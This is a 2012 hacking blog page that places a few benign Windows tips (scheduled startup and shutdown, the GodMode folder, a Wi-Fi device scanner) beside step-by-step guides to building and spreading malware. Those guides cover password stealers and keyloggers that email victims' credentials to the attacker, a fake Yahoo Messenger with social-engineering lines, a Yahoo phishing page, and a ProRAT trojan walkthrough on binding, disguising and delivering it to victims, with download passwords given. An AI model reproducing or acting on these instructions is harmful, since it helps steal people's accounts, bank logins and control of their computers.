Read It!

Tuesday 3 January 2012

Start And Shut Down Computer Automatically On A Schedule




On Windows 

To automatically start your computer up at a specific time of day, you'll actually need to edit your BIOS settings. To do this:


  • Boot up your computer and enter your BIOS setup. Usually this involves pressing the Delete key as your computer boots (your computer should say Press DEL to Enter Setup or something similar as you turn it on).

  • Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different.

  • Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.


You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler:

  • Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.

  • In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out.

  • Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.

  • Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s.

  • Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.
Read more ...

Wireless Network Watcher




Wireless networks have become popular in recent years , thanks to a growing number of devices that use wireless connections to access the Internet. But there is a problem associated with their use, or more precisely with the means used by routers and wireless devices to block unauthorized access : in fact, the device must use the appropriate encryption to prevent access by third parties.

Many users do not know, for example, the differences between WEP or WPA or encryption which of these systems should be selected for better security. This may result that their wireless router remain open and available for unauthorized access, especially if it is not configured no encryption or weak encryption is used.

The best solution is to ' use the strongest encryption possible , but however this may not always be possible, for example if the devices you need to connect to wi-fi router does not support it.
Wireless Network Watcher is a free software program that performs the analysis of a wireless network to list all computers connected to it . The application displays all of the computers that are currently connected to the network in its sparse interface, making it tremendously easier to identify unauthorized access to the network in question.



Each computer or device connected is represented by an IP address, device name, MAC address, some information about the company that created the adapter and network devices . This information can also be exported and saved in various formats, including html files, xml and text files.

This program is highly compatible with editions in 32-bit and 64-bit Windows operating system . Supports all versions of Windows from Windows 2000 to Windows 7, including versions of Windows Server.

The program can scan only the wireless network that is connected to the computer that is running . Users who wish to scan a network to which they are not connected need to connect to it before starting the scan.
It may happen that the program be identified by the wireless network adapter wrong. You can select the right one under "Advanced Options" (F9). Wireless Network Watcher is a portable program that automatically starts scanning immediately after being launched. It may take a few seconds before the list is compiled.

Windows users can download the program from the official site Nirsoft .
Read more ...

God Mode In Windows 7




Windows 7 is now becoming popular among windows operating system  users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.

Follow the following steps to create god mode folder:

1. Create a new folder

2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change automatically,then  double click it to show the GodMode windows options.
Read more ...

Monday 2 January 2012

Ref Stealer




As the name indicates " password stealer " is a hacking tool that will steal passwords from the victim computer without his/her knowledge. It will steal all passwords from internet explorer, firefox , opera , google chrome and even from anywhere. It even steals product keys . Thus you can hack any account that victim is using. You can even hack bank account if victim is using that.

Features of Password Stealer ?
  • Firefox
  • Google Chrome
  • Internet Explorer
  • Dial Up
  • Most of Messengers (Msn, YM, Trillian, etc)

How to use Password Stealer ?
  1. First create new gmail account specially for password stealer.
  2. Now Download password stealer for free 
  3. Extract that rar file to desktop ( just drag and drop the folder )
  4. Open that password stealer and give the information
  5. Give Gmail usename and password created in step 1
  6. Now click on build. And it will create the server.exe
  7. Its not Fud so just refer my previous post and downloader " fud crypter "
  8. After that use provided binder to decorate the spy crypter virus 
  9. Send that spy password stealer virus created to vicitm and ask him to run it.
  10. Done ! You will get all password from victim in just 5 min to the gmail account.

Size: 1.75 MB

Its password is cwh




Read more ...

L33Ts Keylogger




This new released remote keylogger is 100% fud having high spying capacity, It was just created few days ago so no antivirus is aware of this new keylogger , so download and make he use of this keylogger as soon as possible.

Features of this remote keylogger :-
  • Built-In Icon Changer.
  • Ability to send/receive logs through SMTP w/ fully customizable options.
  • Built-in 1-click Vaccine.exe to remove the virus.
  • Send Screenshots w/ each log
  • Compile server as .exe/.com/.pif/.scr file.
  • Ability to Add to startup through HKCU, HKLM, or ActiveX.
  • Unique Polymorphic Server on every Compile.
How to use this fud keylogger :-
  • First create a new gmail account - recommended
  • Then download the remote fud keylogger from below
  • Extract it to desktop and open it
  • Now enter the gmail account id and password and reset the sending intervels
  • Now click on generate and then compile server
  • You will find a new file created to desktop
  • It is looking very dull so I have given a file binder and icon changer along with it
  • Just use that file binder and icon changer - its easy steps so I donot have to explain
  • Now send that file to victim by any mean.
  • Now as soon as victim will run it you will start spying him and hack accounts

Size: 1.97 MB

Its password is cwh


Read more ...

Use USB As Ram To Boost Pc Speed In Windows 7

The more RAM computer, the more speedy and faster the process will do . As we all know that Computer we newly purchase has only 1 GB RAM and that's to low for an average person. And the computer can't run run High Power consuming softwares. moreover, Gamers will face problems due to low RAM. They can add more RAM to Boost PC Speed but indeed it requires to spend 2000 Bucks.


So, I am an awesome method to Increase PC Ram using Pen drive and that will boost PC Speed instantly and easily. This given method is for Windows 7 and can be bit different for other versions of windows. So follow this easy steps and Increase PC Sped Instantly .

How To Use PenDrive As Ram | Boost PC Speed

1. First Go To Control Panel from my computer or startup
2. Then click on System And Security and then System ( shown in screenshots )

usb ram 500 How to use your Pen Drive as RAM 
3. Now click on "Advance System Settings" at left side
4. Click on Settings and the go to Advanced Tab and then Settings > Advanced

5. Now, you can see Virtual Memory, just click on Change
6Here you have to uncheck "Automatically manage paging file size"
7. Now, click on your pen drive, and set the custom size.
8. Ex. In 4 GB pen drive, 700 is initial size and 3000 is maximum size


Note :- You computer will restart and then you can see instant boost in your computer's performance.  

So, friends I hope you have enjoyed this article

Read more ...

Sunday 1 January 2012

Yahoo Hacker

1. First disable your anitivirus - Trust me this tool is created by me :)
2. Download Yahoo Hacker Creater ( Make yahoo messenger )
3. And follow this steps as shown in the image below


4. Enter Gmail username and password ( I suggest to create fake account in gmail )
5. Then click on Build and fake spying yahoo messenger will be created like above
6. Thats it , Enjoy Hacking Of Yahoo .
Note : This fake Yahoo messenger is not FUD and detected by most antivirus as virus.

Human Manipulation and Social Engineering 

Its not the end of hacking, the main and last step is remaining, To fool your victim, just tell him anything that he/she may like. Tell him/her that this is a very new version of Yahoo messenger and have the facility to Make Free Call Worldwide, then see will download your fake yahoo messenger and will try to login and you will get the password and her username too and you "Hack Yahoo Account".


Size: 96.33 KB

Its password is cwh


Read more ...

Dscreet Keylogger




How to use
Gmail User: Enter the gmail (*)(*)(*)(*)(*)(*)(*)(*) for the account in which
you want to recieve the logs.

Gmail Pass: Password for the gmail account you entered above.

Server Name: The name you want the virus file to be.

Interval: How often you want to recieve logs to your email account.
shorter interval means smaller logs more often and longer means
larger logs less often. MAKE SURE TO PUT THE TIME IN SECONDS E.G. 1MIN = 60SEC.

Download Link (optional): If the downloader checkbox is ticked, put the direct url to the
file you want to download e.g. rat/botnet here.

Anti's: Select this checkbox if you want to activate process killers.

Add To Startup: Select this checkbox if you want your server to be run every time the victims computer
starts up. (recommended)

USB Spread: Select this checkbox if you want to enable USB spreading.

Delete Cookies: Select this checkbox if you want to victim to have to enter all their saved passwords
again. (recommended)

Downloader: Explained above.

Kill Taskmanager: Disables the victims taskmanager.

Icon Changer: Select this checkbox and use the "Load Icon" button to change the icon of your server file when it
is created.

Fake Error: Select this checkbox and use the "Fake Error Message" box to create an error message that
will be shown when the server is run on the victims computer.


Size: 174.54 KB

Its password is cwh


Read more ...

HatRia Keylogger



Size: 84.94 KB

Its password is cwh



Read more ...

Rin Logger


  • Download Rin Logger.
  • Run the keylogger file on your computer and hit on “Create new”.


  •  Now, enter the information as follows:
    Email address: Email address where you want to receive all hacked passwords. Use Gmail address (recommended).
    Account Password: Password of your Email address.
    Keylogger Recepients: Enter your Email and hit On Add.
  • Hit on Next. Now, enter the time duration between two emails. If you set it to 5 minutes, you will receive emails after every 5 minutes. Hit on Next.

  •  Now, change Install keylogger to “Enabled”. Name the file anything you want and select Installation path as “Startup”.
  • There are many more features in this key logger like Download Setup, Dialog Setup, Website Viewer, File Binder, MoZilla Firefox, Administrator Task etc.
  • Now Set File Properties. 
  •  Now, hit on “Save As” and select the path where you want to save your keyloggerserver file. Click on “Compile”.
  •  Done and hack Gmails accounts, This kelogger is very popular.
  • Other Features
  •  Melt File
  •  Downloader
  • Web-Viewer
  • Flexible fake Message
  • Attach screenshots for each logging session
  • Multiple log recipients


Size: 1.64 MB

Its password is cwh


Read more ...

Yahoo Phishing Page



The First Step in Making the site is to register an account at http://www.my3gb.com/register.jsp (if you have account than you can skip first 2 steps)

Now Goto your email account that you gave and confirm your account with confirmation link



 Now Download Yahoo Phisher.


Now Goto http://www.my3gb.com/ and Log into your account.

Now when you are logged into your account click on the File Manager.



Now delete everything from your my3gb account(if anything present) and then click on upload button to upload both files.



Now choose the files which are in the archive that you have downloaded upload both files(index.html and login.php)



Now any one who visits your site and login would be taken to the Yahoo Sign In Seal Page. So there is less chance that it will be detected.

Now to access the input data of your phishing page then goto your my3gb account and login and open the lol.txt file to see the email address and password






(Note:once if you open the lol.txt file then the file will not be able record any information more so delete all three files [index.html,login.php and lol.txt] and then upload again boh files [index.html and login.php] that you have been downloaded a archive of yahoo phisher then again your phishing page works and record email addresses and password but if you once again open the lol.txt file to see the emails and password then you  have to repeat the procedure again.)



Size: 12.5 KB

Its password is cwh


Read more ...

ProRAT

1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it.

2. Open up the program. You should see the following:





3. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".



4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.



5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:



6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.



7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.



8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.


9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.



12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.


13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.


14. Below is an image of the victims task bar after the hacker clicks on Hide Start Button.



15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.



As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.



Size: 3.06 MB


Its password is cwh



Read more ...